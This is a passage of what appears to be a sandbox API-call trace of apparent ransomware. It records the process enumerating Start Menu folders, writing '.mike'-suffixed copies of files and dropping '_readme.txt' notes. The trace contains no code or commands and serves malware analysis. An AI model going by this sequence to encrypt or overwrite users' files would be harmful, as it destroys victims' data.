Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2126628 | out: lpFileInformation=0x2126628*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2672e800, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2672e800, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2672e800, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680)) returned 1 [0156.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.312] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.312] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.312] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aec08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.312] DeleteFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt")) returned 1 [0156.313] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.313] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0156.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.314] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.314] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0156.314] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0156.315] GetFileType (hFile=0x1c8) returned 0x1 [0156.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0156.315] GetFileType (hFile=0x1c8) returned 0x1 [0156.315] WriteFile (in: hFile=0x1c8, lpBuffer=0x2128308*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af028, lpOverlapped=0x0 | out: lpBuffer=0x2128308*, lpNumberOfBytesWritten=0x2af028*=0x45e, lpOverlapped=0x0) returned 1 [0156.316] CloseHandle (hObject=0x1c8) returned 1 [0156.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.316] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java", lpFilePart=0x0) returned 0x3d [0156.316] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\", nBufferLength=0x105, lpBuffer=0x2aebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\", lpFilePart=0x0) returned 0x3e [0156.317] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c71a080, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c71a080, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c71a080, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x9f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="About Java.lnk.mike", cAlternateFileName="ABOUTJ~1.MIK")) returned 1 [0156.317] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7401e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7401e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7401e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xa10, dwReserved0=0x0, dwReserved1=0x0, cFileName="Check For Updates.lnk.mike", cAlternateFileName="CHECKF~1.MIK")) returned 1 [0156.318] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7401e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7401e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c766340, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x9e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Configure Java.lnk.mike", cAlternateFileName="CONFIG~1.MIK")) returned 1 [0156.318] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c766340, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c766340, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c766340, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Help.lnk.mike", cAlternateFileName="GETHEL~1.MIK")) returned 1 [0156.318] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c78c4a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c78c4a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c78c4a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visit Java.com.lnk.mike", cAlternateFileName="VISITJ~1.MIK")) returned 1 [0156.319] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7401e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2672e800, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x26754960, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0156.319] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2672e800, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2672e800, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2672e800, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 1 [0156.319] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2672e800, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2672e800, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2672e800, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 0 [0156.319] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.319] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\.", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", lpFilePart=0x0) returned 0x44 [0156.320] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.320] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.320] CoTaskMemFree (pv=0x508980) [0156.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.320] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", lpFilePart=0x0) returned 0x44 [0156.320] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", nBufferLength=0x105, lpBuffer=0x2aebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpFilePart=0x0) returned 0x45 [0156.321] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c78c4a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c78c4a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7b2600, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x740, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backup and Restore Center.lnk.mike", cAlternateFileName="BACKUP~1.MIK")) returned 1 [0156.322] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.322] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk.mike", lpFilePart=0x0) returned 0x67 [0156.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0156.322] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.322] GetFileType (hFile=0x1c8) returned 0x1 [0156.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0156.323] GetFileType (hFile=0x1c8) returned 0x1 [0156.323] CloseHandle (hObject=0x1c8) returned 1 [0156.323] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.323] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.323] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeb84, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0156.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d8) returned 1 [0156.323] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0156.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.323] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x21366b4 | out: lpFileInformation=0x21366b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7b2600, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7b2600, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7d8760, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0156.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.323] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.323] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x21369f4 | out: lpFileInformation=0x21369f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7b2600, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7b2600, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7d8760, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0156.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.323] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.324] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0156.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.324] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.324] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.324] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.324] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike", lpFilePart=0x0) returned 0x55 [0156.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc8) returned 1 [0156.324] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af044 | out: lpFileInformation=0x2af044*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0156.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc4) returned 1 [0156.325] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike", lpFilePart=0x0) returned 0x55 [0156.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0156.325] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.355] GetFileType (hFile=0x1c8) returned 0x1 [0156.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0156.355] GetFileType (hFile=0x1c8) returned 0x1 [0156.355] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x0 [0156.355] WriteFile (in: hFile=0x1c8, lpBuffer=0x2137964*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x2137964*, lpNumberOfBytesWritten=0x2aefe4*=0x220, lpOverlapped=0x0) returned 1 [0156.356] CloseHandle (hObject=0x1c8) returned 1 [0156.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0156.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x2137434 | out: lpFileInformation=0x2137434*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7b2600, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7b2600, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7d8760, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0156.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0156.356] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0156.357] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.357] GetFileType (hFile=0x1c8) returned 0x1 [0156.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0156.357] GetFileType (hFile=0x1c8) returned 0x1 [0156.358] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike", lpFilePart=0x0) returned 0x55 [0156.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0156.358] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.358] GetFileType (hFile=0x1c8) returned 0x1 [0156.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0156.358] GetFileType (hFile=0x1c8) returned 0x1 [0156.358] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x220 [0156.359] WriteFile (in: hFile=0x1c8, lpBuffer=0x213d384*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x213d384*, lpNumberOfBytesWritten=0x2aefe4*=0x460, lpOverlapped=0x0) returned 1 [0156.359] CloseHandle (hObject=0x1c8) returned 1 [0156.360] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aea78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike", lpFilePart=0x0) returned 0x55 [0156.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0156.360] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.360] GetFileType (hFile=0x1c8) returned 0x1 [0156.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0156.360] GetFileType (hFile=0x1c8) returned 0x1 [0156.362] WriteFile (in: hFile=0x1c8, lpBuffer=0x21405c0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21405c0*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0156.362] CloseHandle (hObject=0x1c8) returned 1 [0156.362] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 